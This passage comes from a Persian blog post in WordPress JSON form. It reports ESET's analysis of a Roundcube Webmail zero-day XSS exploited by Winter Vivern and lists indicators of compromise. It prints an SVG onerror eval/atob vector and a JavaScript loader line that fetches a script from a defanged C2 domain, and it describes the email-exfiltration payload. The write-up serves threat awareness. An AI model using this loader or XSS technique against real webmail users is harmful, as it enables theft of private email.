class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;x&#8221;<\/span> <span class=\"crayon-v\">onerror<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;eval(atob(&#8216;&lt;base64-encoded payload&gt;&#8217;))&#8221;<\/span> <span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">svg<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0002 seconds] --><\/p>\n<p>\u0628\u0627 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646\u06a9\u0647\u060c \u0645\u0642\u062f\u0627\u0631 X \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc href \u0645\u0639\u062a\u0628\u0631 \u0646\u06cc\u0633\u062a\u060c \u0648\u06cc\u0698\u06af\u06cc onerror \u0627\u06cc\u0646 \u0634\u06cc \u0641\u0639\u0627\u0644 \u0645\u06cc\u0634\u0647. \u0628\u0627 \u062f\u06cc\u06a9\u062f \u06a9\u0631\u062f\u0646 \u067e\u06cc\u0644\u0648\u062f \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc onerror \u060c \u0645\u062d\u0642\u0642\u0627 \u0628\u0647 \u06a9\u062f \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0632\u06cc\u0631 \u0631\u0633\u06cc\u062f\u0646 \u06a9\u0647 \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0642\u0631\u0628\u0627\u0646\u06cc \u0648 \u062f\u0631 \u0632\u0645\u06cc\u0646\u0647 \u06cc Roundcube session \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647 :<\/p>\n<p><!-- Urvanov Syntax Highlighter v2.8.34 --><\/p>\n<div id=\"urvanov-syntax-highlighter-653cef69cd60b173206311\" class=\"urvanov-syntax-highlighter-syntax crayon-theme-bncplusplus urvanov-syntax-highlighter-font-tahoma urvanov-syntax-highlighter-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\">\n<div class=\"urvanov-syntax-highlighter-plain-wrap\"><textarea class=\"urvanov-syntax-highlighter-plain print-no\" readonly=\"readonly\" wrap=\"soft\" data-settings=\"dblclick\">&lt;br \/&gt;<br \/>\nvar fe=document.createElement(&#8216;script&#8217;);fe.src=&#8221;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&#8221;;document.body.appendChild(fe);<\/textarea><\/div>\n<div class=\"urvanov-syntax-highlighter-main\">\n<table class=\"crayon-table\">\n<tbody>\n<tr class=\"urvanov-syntax-highlighter-row\">\n<td class=\"crayon-nums \" data-settings=\"show\"><\/td>\n<td class=\"urvanov-syntax-highlighter-code\">\n<div class=\"crayon-pre\">\n<div id=\"urvanov-syntax-highlighter-653cef69cd60b173206311-1\" class=\"crayon-line\"><span class=\"crayon-t\">var<\/span> <span class=\"crayon-v\">fe<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">createElement<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;script&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">fe<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e \">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;https:\/\/recsecas[.]com\/controlserver\/checkupdate.js&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">body<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">appendChild<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fe<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p><!-- [Format Time: 0.0011 seconds] --><\/p>\n<p>\u0645\u062d\u0642\u0642\u0627 \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u0646 \u06a9\u0647 \u0627\u06cc\u0646 \u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0631\u0648\u06cc \u06cc\u0647 \u0646\u0645\u0648\u0646\u0647 \u0627\u0635\u0644\u0627\u062d \u0634\u062f\u0647 \u06a9\u0627\u0631 \u0645\u06cc\u06a9\u0646\u0647\u060c \u062f\u0631 \u0646\u062a\u06cc\u062c\u0647 \u0641\u0647\u0645\u06cc\u062f\u0646 \u06a9\u0647 \u0628\u0627 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc \u0645\u0648\u0627\u062c\u0647 \u0647\u0633\u062a\u0646. \u0627\u06cc\u0646 \u0632\u06cc\u0631\u0648\u062f\u06cc \u062f\u0631 <a href=\"https:\/\/github.com\/roundcube\/roundcubemail\/blob\/7b2df52ede57bab9e87e9c3bc00601eeca591a5e\/program\/lib\/Roundcube\/rcube_washtml.php\" target=\"_blank\" rel=\"noopener\">rcube_washtml.php<\/a> \u0647\u0633\u062a\u0634 \u06a9\u0647 \u0628\u062f\u0631\u0633\u062a\u06cc \u0639\u0645\u0644 \u067e\u0627\u06a9\u0633\u0627\u0632\u06cc (sanitize) \u0631\u0648 \u0627\u0646\u062c\u0627\u0645 \u0646\u0645\u06cc\u062f\u0647.<\/p>\n<p>\u067e\u0633 \u0628\u0637\u0648\u0631 \u06a9\u0644\u06cc \u0645\u0647\u0627\u062c\u0645 \u0628\u0627 \u0633\u0627\u062e\u062a\u0646 \u06cc\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0645\u062e\u0631\u0628 \u0648 \u0627\u0631\u0633\u0627\u0644 \u0627\u0648\u0646 \u0645\u06cc\u062a\u0648\u0646\u0647 \u0647\u0631 \u06a9\u062f \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u062f\u0644\u062e\u0648\u0627\u0647 \u0631\u0648 \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u0642\u0631\u0628\u0627\u0646\u06cc \u0627\u062c\u0631\u0627 \u06a9\u0646\u0647. \u062a\u0646\u0647\u0627 \u062a\u0639\u0627\u0645\u0644\u06cc \u06a9\u0647 \u0642\u0631\u0628\u0627\u0646\u06cc \u0628\u0627\u06cc\u062f \u0627\u0646\u062c\u0627\u0645 \u0628\u062f\u0647 \u0627\u06cc\u0646\u0647 \u06a9\u0647 \u0627\u06cc\u0645\u06cc\u0644 \u0631\u0648 \u0628\u0627\u0632 \u06a9\u0646\u0647.<\/p>\n<p>\u062f\u0631 \u0645\u0631\u062d\u0644\u0647 \u062f\u0648\u0645 \u062d\u0645\u0644\u0647 \u060c \u06cc\u0647 \u0644\u0648\u062f\u0631 \u062c\u0627\u0648\u0627\u0627\u0633\u06a9\u0631\u06cc\u067e\u062a \u0633\u0627\u062f\u0647 \u0628\u0646\u0627\u0645 checkupdate.js \u0631\u0648 \u0627\u062c\u0631\u0627 \u0645\u06cc\u0634\u0647: (\u0641\u0627\u06cc\u0644\u0634 \u0631\u0648 \u0645\u06cc\u062a\u0648\u0646\u06cc\u062f \u0627\u0632 <a href=\"https:\/\/github.com\/onhexgroup\/Malware-Sample\/tree\/main#wintervivern---checkupdatejs\" target=\"_blank\" rel=\"noopener\">\u06af\u06cc\u062a\u0647\u0627\u0628\u0645\u0648\u0646<\/a> \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0646\u06cc\u062f)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4954\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-3.webp\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-3.webp 819w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-12.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-13.webp 768w\" alt=\"\u0644\u0648\u062f\u0631 checkupdate.js\" width=\"819\" height=\"271\" data-dominant-color=\"f0f1f2\" data-has-transparency=\"false\" title=\"\"><\/p>\n<p>\u067e\u06cc\u0644\u0648\u062f \u0646\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062f\u0631 \u0634\u06a9\u0644 \u0632\u06cc\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u06a9\u0646\u06cc\u062f\u060c \u0645\u06cc\u062a\u0648\u0646\u0647 \u0627\u06cc\u0645\u06cc\u0644\u0647\u0627 \u0648 \u0641\u0648\u0644\u062f\u0631\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 \u0627\u06a9\u0627\u0646\u062a \u0641\u0639\u0644\u06cc Roundcube \u0631\u0648 \u0644\u06cc\u0633\u062a \u06a9\u0646\u0647 \u0648 \u067e\u06cc\u0627\u0645\u0647\u0627\u06cc \u0627\u06cc\u0645\u06cc\u0644 \u0627\u0633\u062a\u062e\u0631\u0627\u062c \u0634\u062f\u0647 \u0631\u0648 \u0627\u0632 \u0637\u0631\u06cc\u0642 HTTP \u0628\u0647 \u0633\u0631\u0648\u0631 C2 \u06a9\u0647 \u0622\u062f\u0631\u0633\u0634 <code>https:\/\/recsecas[.]com\/controlserver\/saveMessage<\/code> \u0647\u0633\u062a\u060c \u0627\u0631\u0633\u0627\u0644 \u06a9\u0646\u0647.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"not-transparent aligncenter size-full wp-image-4955\" src=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-4.webp\" sizes=\"auto, (max-width: 1108px) 100vw, 1108px\" srcset=\"https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-4.webp 1108w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-14.webp 300w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-15.webp 1024w, https:\/\/afaghhosting.net\/blog\/wp-content\/uploads\/2023\/10\/d8a2d8b3db8cd8a8-d9bed8b0db8cd8b1db8c-d8b2db8cd8b1d988d8afdb8c-d8afd8b1-roundcube-webmail-d987d8afd981-d987daa9d8b1d987d8a7db8c-d8b1d988d8b3-16.webp 768w\" alt=\"\u067e\u06cc\u0644\u0648\u062f \u0646\u0647\u0627\u06cc\u06cc\" width=\"1108\" height=\"648\" data-dominant-color=\"f4f4f6\" data-has-transparency=\"false\" title=\"\"><\/p>\n<h2>IoC\u0647\u0627\u06cc \u06af\u0632\u0627\u0631\u0634 :<\/h2>\n<p>\u0641\u0627\u06cc\u0644\u0647\u0627 :<\/p>\n<div class=\"table-container\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td><strong>SHA-1<\/strong><\/td>\n<td><strong>Filename<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>97ED594EF2B5755F0549C6C5758377C0B87CFAE0<\/td>\n<td>checkupdate.js<\/td>\n<td dir=\"ltr\">JavaScript loader.<\/td>\n<\/tr>\n<tr>\n<td>8BF7FCC70F6CE032217D9210EF30314DDD6B8135<\/td>\n<td>N\/A<\/td>\n<td dir=\"ltr\">JavaScript\u00a0payload\u00a0exfiltrating emails in Roundcube.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>\u0634\u0628\u06a9\u0647<\/p>\n<div class=\"table-container\">\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td><strong>IP<\/strong><\/td>\n<td><strong>Domain<\/strong><\/td>\n<td><strong>Hosting provider<\/strong><\/td>\n<td><strong>First seen<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>\n<p dir=\"ltr\">38.180.76[.]31<\/p>\n<\/td>\n<td>recsecas[.]com<\/td>\n<td>M247 Europe SRL<\/td>\n<td>2023-09-28<\/td>\n<td>C&amp;C server<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<p>\u0622\u062f\u0631\u0633 \u0627\u06cc\u0645\u06cc\u0644 :<\/p>\n<p>team.managment@outlook[.]com<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647: 4 \u062f\u0642\u06cc\u0642\u0647 \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u06cc\u0647 \u06af\u0632\u0627\u0631\u0634\u06cc \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f\u0646 \u062f\u0631 \u062e\u0635\u0648\u0635 \u06cc\u0647 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0632\u06cc\u0631\u0648\u062f\u06cc XSS \u062f\u0631 Roundcube Webmail \u06a9\u0647 \u0627\u062e\u06cc\u0631\u0627 \u06af\u0631\u0648\u0647 \u0647\u06a9\u0631\u06cc \u0631\u0648\u0633\u06cc Winter Vivern \u0628\u0627\u0647\u0627\u0634 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062f\u0648\u0644\u062a\u06cc \u0648 \u06cc\u0647 \u0627\u062a\u0627\u0642 \u0641\u06a9\u0631 \u062f\u0631 \u0627\u0631\u0648\u067e\u0627 \u0631\u0648 \u0647\u06a9 \u06a9\u0631\u062f\u0646. \u062c\u062f\u0648\u0644 \u0632\u0645\u0627\u0646\u06cc \u0627\u0641\u0634\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc : 12 \u0627\u06a9\u062a\u0628\u0631 2023 : \u0645\u062d\u0642\u0642\u0627\u06cc ESET \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648 \u0628\u0647 &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26,28,29,34],"tags":[],"class_list":["post-50682","post","type-post","status-publish","format-standard","hentry","category-vulnerability","category-28","category-29","category-server"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50682"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682\/revisions"}],"predecessor-version":[{"id":50758,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50682\/revisions\/50758"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50682"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50682"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50682"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}